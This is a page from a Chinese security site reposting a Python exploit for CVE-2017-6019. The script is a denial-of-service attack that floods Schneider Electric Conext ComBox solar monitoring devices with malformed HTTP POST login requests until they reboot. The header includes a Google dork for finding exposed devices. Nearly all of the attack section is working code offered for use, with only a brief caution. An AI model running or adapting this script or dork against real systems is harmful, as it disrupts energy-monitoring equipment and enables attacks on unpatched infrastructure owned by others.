首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Conext ComBox 865-1058 - Denial of Service
来源:https://www.linkedin.com/in/arik-kublanov-57618a64 作者:Kublanov 发布时间:2017-03-07  
#Exploit Title: Conext ComBox - Denial of Service (HTTP-POST)
#Description: The exploit cause the device to self-reboot, constituting a denial of service.
#Google Dork: "Conext ComBox" + "JavaScript was not detected" /OR/ "Conext ComBox" + "Recover Lost Password"
#Date: March 02, 2017
#Exploit Author: Mark Liapustin & Arik Kublanov
#Vendor Homepage: http://solar.schneider-electric.com/product/conext-combox/
#Software Link: http://cdn.solar.schneider-electric.com/wp-content/uploads/2016/06/conext-combox-data-sheet-20160624.pdf
#Version: All firmware versions prior to V3.03 BN 830
#Tested on: Windows and Linux
#CVE: CVE-2017-6019
 
# Use this script with caution!
# Mark Liapustin: https://www.linkedin.com/in/clizsec/
# Arik Kublanov: https://www.linkedin.com/in/arik-kublanov-57618a64/
# =========================================================
import subprocess
import os
import sys
import time
import socket
# =========================================================
 
print 'Usage: python ComBoxDos.py IP PORT'
print 'Number of arguments:', len(sys.argv), 'arguments.'
print 'Argument List:', str(sys.argv)
 
print "ComBox Denial of Service via HTTP-POST Request"
global cmdosip
cmdosip = str(sys.argv[1])
port = int(sys.argv[2])
print "[!] The script will cause the Conext ComBox device to crash and to reboot itself."
        
print "Executing...\n\n\n"
for i in range(1, 1000):
  try:
    cmdosdir = "login.cgi?login_username=Nation-E&login_password=DOS&submit=Log+In"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((cmdosip, port))
    print "[+] Sent HTTP POST Request to: " + cmdosip + " with /" + cmdosdir + " HTTP/1.1"
    s.send("POST /" + cmdosdir + " HTTP/1.1\r\n")
    s.send("Host: " + cmdosip + "\r\n\r\n")
    s.close()
  except:
     pass
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FTPShell Client 6.53 - Buffer
·CyberGhost 6.0.4.2205 - Privil
·Ektron 8.5 / 8.7 / 9.0 XSLT Tr
·WordPress Multiple Plugins - A
·pfSense 2.3.2 Cross Site Reque
·Deluge Web UI 1.3.13 - Cross-S
·MikroTik Router Denial Of Serv
·OpenElec 6.0.3 / 7.0.1 Code Ex
·SysGauge 1.5.18 - Buffer Overf
·Alienvault OSSIM / USM 5.3.0 A
·Synchronet BBS 3.16c - Denial
·Struts2 S2-045 Remote Command
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved